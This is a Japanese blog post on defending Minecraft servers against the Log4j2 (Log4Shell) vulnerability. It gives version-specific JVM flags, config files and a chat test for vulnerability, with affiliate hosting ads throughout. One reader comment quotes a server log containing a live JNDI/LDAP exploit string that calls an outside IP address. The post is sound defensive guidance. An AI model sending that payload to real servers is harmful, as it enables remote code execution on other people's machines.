【マイクラ】Log4j2問題のサーバー対策方法【バニラ/プラグイン/MOD対応】
当サイトには「アフィリエイト広告」や「画像生成AI」が含まれています
- アフィリエイト広告の掲載について
-
2023年10月1日より施行された景品表示法の指定告示(通称:ステマ規制)によって、広告を掲載しているサイトやメディア、SNS内に、読者が認識できるような表記が必須となりました。
当サイトにおいても景品表示法に則り、冒頭に表記するようにしていますので、ご理解の上、ご覧いただけますと幸いです。
- 生成AIの掲載について
-
当サイトの一部記事では、直感的に理解するための視覚的な補助として、「画像生成AI」を使用していますが、記事本文についてはAIによる自動生成ではなく、中の人(揚げたてのポテト)がせっせと書いた文章であり、オリジナル性があることを保証いたします。
分かりやすく見やすくをモットーにお届けできるよう努めていきますので、安心してお読みください。
当サイトには「アフィリエイト広告」や「画像生成AI」が含まれています
- アフィリエイト広告の掲載について
-
2023年10月1日より施行された景品表示法の指定告示(通称:ステマ規制)によって、広告を掲載しているサイトやメディア、SNS内に、読者が認識できるような表記が必須となりました。
当サイトにおいても景品表示法に則り、冒頭に表記するようにしていますので、ご理解の上、ご覧いただけますと幸いです。
- 生成AIの掲載について
-
当サイトの一部記事では、直感的に理解するための視覚的な補助として、「画像生成AI」を使用していますが、記事本文についてはAIによる自動生成ではなく、中の人(揚げたてのポテト)がせっせと書いた文章であり、オリジナル性があることを保証いたします。
分かりやすく見やすくをモットーにお届けできるよう努めていきますので、安心してお読みください。
揚げたてのポテト2021年12月頃に「Log4j2の脆弱性」に関する問題が話題になりました。
ポテコちゃんえ!?そうなの?初耳なんだけど…
揚げたてのポテトマイクラにも大きく関わる問題なので、確認しながら見ていきましょう。今回はイマイチ分からない人のためにまとめてみました。
この記事を書いた人
揚げたてのポテト
- 当サイト「揚げポテほかほかクラフト」の管理人
- Minecraft歴10年以上|サーバー運用10年以上
- 見やすく、分かりやすくを心掛けて書いています。
スクロールできます
| 【おすすめ】当サイトが厳選した有料のマイクラサーバー! | ||
|---|---|---|
 ConoHa for GAME | 解説ページへ | 4GBプラン:月額1,292円/8GBプラン:月額2,239円 ※上記料金は割引キャンペーン適用済み(2026年5月15日まで) 「圧倒的な知名度だから安心して使える!料金もオトク!」 「当サイトから申し込むと700円分クーポンが貰える!」 |
 ロリポップ! for Gamers | 解説ページへ | 4GBプラン:月額1,500円/8GBプラン:月額3,000円 新機能「MODかんたんインストール」が実装!(Minecraftのみ) 新情報「最短3日」から契約可能に! 「国内トップ級の性能と高速回線!通常料金が他社より安い!」 「マイクラサーバーがたった3ステップですぐ遊べる!」 |
 XServer GAMEs | 解説ページへ | 4GBプラン:月額1,460円/8GBプラン:月額2,500円 「他社より安く、期間限定で無料サーバーも使える!」 「マイクラサーバーに特化したゲーム設定が豊富!」 |
目次
Log4j2問題って何?
ポテコちゃんところでLog4j2問題ってどんなの?
マインクラフトでは、「Log4j2」というログを出力するプログラムが使われています。
このLog4j2に関して、2021年12月10日にMinecraftの関連団体より、クライアント及びサーバーに関する重大な脆弱性が発見されたとの注意喚起が発表されました。当時マイクラにも関係していたため、大きく話題になりました。
マインクラフトでは、この脆弱性を悪用することで、任意のリモートコードを実行できてしまう例が報告されています。
要するに任意のコードを実行させると最悪パソコン操作もできてしまうという重大な問題です。
そのため、マイクラサーバーでは一部バージョンに限り、対策する必要があります。
揚げたてのポテトちなみに、公式クライアント(公式ランチャー)も、Log4j2問題に対応するパッチ(修正プログラム)が更新されているため、現在は気にせずに遊べます。
サーバーの対策方法
マイクラサーバーでは、バニラサーバーやプラグインサーバー、MODサーバーによって、それぞれ対策方法が異なりますので、注意してください。
あわせて読みたい
【26.1.2対応】初心者向けのマイクラサーバー立て方(Java版)を紹介!【公式/バニラ】
皆さんは友達や知り合いと一緒に、自分たちのワールドで遊んでみたいと思ったことありませんか? あるある!でも一緒にマルチプレイするには、マイクラサーバーを立てる…
バニラサーバーは、マイクラ公式からダウンロードするサーバー(公式サーバー)のことです。
バッチファイルに追加記述とjarファイル名を変更することで動作します。
- バージョン1.18.1以降
-
- バージョン1.18.1以降よりパッチ適用
- バージョン1.17~1.18
-
バッチファイルに「-Dlog4j2.formatMsgNoLookups=true」のコードを追加します。
@echo off java -Dlog4j2.formatMsgNoLookups=true -jar server-1.17.jar nogui pause - バージョン1.12~1.16.5
-
サーバーフォルダに「log4j2_112-116.xml」のXMLファイルを保存する必要があります。
ファイル名 対応バージョン ダウンロード先 log4j2_112-116.xml 1.12~1.16.5 ダウンロード
右クリック→「名前を付けてリンク先を保存」
保存できたら、バッチファイルに「-Dlog4j.configurationFile=log4j2_112-116.xml」のコードを追加します。
@echo off java -Dlog4j.configurationFile=log4j2_112-116.xml -jar server-1.16.5.jar nogui pause - バージョン1.7~1.11.2
-
サーバーフォルダに「log4j2_17-111.xml」のXMLファイルを保存する必要があります。
ファイル名 対応バージョン ダウンロード先 log4j2_17-111.xml 1.7~1.11.2 ダウンロード
右クリック→「名前を付けてリンク先を保存」
保存できたら、バッチファイルに「-Dlog4j.configurationFile=log4j2_17-111.xml」のコードを追加します。
@echo off java -Dlog4j.configurationFile=log4j2_17-111.xml -jar server-1.11.2.jar nogui pause - バージョン1.7以下
-
バージョン1.7以下は、Log4j2の脆弱性による影響が無いため、対策する必要はありません。
スクロールできます
| 【おすすめ】当サイトが厳選した有料のマイクラサーバー! | ||
|---|---|---|
ConoHa for GAME | 解説ページへ | 4GBプラン:月額1,292円/8GBプラン:月額2,239円 ※上記料金は割引キャンペーン適用済み(2026年5月15日まで) 「圧倒的な知名度だから安心して使える!料金もオトク!」 「当サイトから申し込むと700円分クーポンが貰える!」 |
ロリポップ! for Gamers | 解説ページへ | 4GBプラン:月額1,500円/8GBプラン:月額3,000円 新機能「MODかんたんインストール」が実装!(Minecraftのみ) 新情報「最短3日」から契約可能に! 「国内トップ級の性能と高速回線!通常料金が他社より安い!」 「マイクラサーバーがたった3ステップですぐ遊べる!」 |
XServer GAMEs | 解説ページへ | 4GBプラン:月額1,460円/8GBプラン:月額2,500円 「他社より安く、期間限定で無料サーバーも使える!」 「マイクラサーバーに特化したゲーム設定が豊富!」 |
脆弱性の確認方法
不安がある方は、専用コマンドを実行すると脆弱性の対策が行えているか確認できます。
マイクラチャットにて、以下のコマンドを「/(スラッシュ)」入れずにそのまま送信してください。
${date:YYYY}
この時に「現在の西暦」が表示されなければ対策できています。
最後に
取り急ぎまとめた記事なので説明不足な部分もあるかと思いますが、改めて追記や修正を行いたいと思います。
Log4j2の脆弱性は大変危険な問題です。
サーバー運営してる人やマルチプレイで良く遊ぶ人は必ず対策を行いましょう!
揚げたてのポテト最後まで読んでいただきありがとうございました。
次回の記事でお会いしましょう!
スクロールできます
| 【おすすめ】当サイトが厳選した有料のマイクラサーバー! | ||
|---|---|---|
ConoHa for GAME | 解説ページへ | 4GBプラン:月額1,292円/8GBプラン:月額2,239円 ※上記料金は割引キャンペーン適用済み(2026年5月15日まで) 「圧倒的な知名度だから安心して使える!料金もオトク!」 「当サイトから申し込むと700円分クーポンが貰える!」 |
ロリポップ! for Gamers | 解説ページへ | 4GBプラン:月額1,500円/8GBプラン:月額3,000円 新機能「MODかんたんインストール」が実装!(Minecraftのみ) 新情報「最短3日」から契約可能に! 「国内トップ級の性能と高速回線!通常料金が他社より安い!」 「マイクラサーバーがたった3ステップですぐ遊べる!」 |
XServer GAMEs | 解説ページへ | 4GBプラン:月額1,460円/8GBプラン:月額2,500円 「他社より安く、期間限定で無料サーバーも使える!」 「マイクラサーバーに特化したゲーム設定が豊富!」 |
この記事が気に入ったら
フォローしてね!
更新の止まった古いプラグインって使ってても大丈夫ですかね?
PaperMCver1.16未満は
パッチが適用されていないそうですが
PaperMCでLog4j2の
対策をする方法は無いのですか?
1.18.1-39.0.0でConohaでForgeサーバーをたててます、1日立てっぱなしにしてたら [User Authenticator #2/INFO]: UUID of player FermatSleep is xxxxxx
[01:13:20] [Server thread/INFO]: Using new advancement loading for net.minecraft.server.PlayerAdvancements@3xxxxx
[01:13:20] [Server thread/INFO]: FermatSleep[/xxxxx] logged in with entity id 3512 at (xxxxxx)
[01:13:20] [Server thread/INFO]: FermatSleep joined the game
[01:13:21] [Server thread/INFO]: ${jndi:ldap://185.233.105.120:1389/a}
[01:13:22] [Server thread/INFO]: FermatSleep lost connection: Disconnected
[01:13:22] [Server thread/INFO]: FermatSleep left the game
みたいなログが残ってました。log4j?かなにかをされたと思うのですが具体的に何をされたか、何かされていた場合どう対処すればいいかわかりませんか?( ; ; )
現在1.16.5のmod入りサーバーで遊んでいます。
ランチャーとforgeを最新のものに更新し、公式のJVM引数もコピペ済みなのですが、アップデートなど行われていないMODを入れるのは避けるべきでしょうか?
mohistはもうパッチきましたか?